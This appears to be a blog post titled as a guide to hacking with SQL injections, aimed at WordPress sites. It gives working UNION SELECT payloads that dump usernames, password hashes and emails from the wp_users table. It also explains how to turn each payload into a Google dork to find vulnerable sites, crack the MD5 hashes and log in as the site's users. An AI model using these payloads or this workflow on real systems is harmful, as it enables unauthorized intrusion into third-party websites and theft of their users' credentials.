hacking with SQL injections, lets see
Cilck here to heck List of wordpress SQL Injections
How To use it ?
For Example 1st injection is "wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--",index.php?
cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null%20FROM%20wp_users/* Now Modify it into a Google Dork, For making Dork use "Inurl:injection's php or dire here" for example for this injection dork will be "inurl:wp-content/plugins/st_newsletter/stnl_iframe.php" Now Go to Google.com and type your modified dork and see the serach result the search result will be like this for dork http://siite.com/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter= Reomve the words after iframe.php and put ur SQl injection here ... now the url will be http://siite.com/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--You will got the use name and md5 coded password ... Crash the password using md5 decoding Tools and login here http://site.com/wp-login.php
Note : The Process is same for all Injections is same ... cooment below if any dobught ..
0 comments:
Post a Comment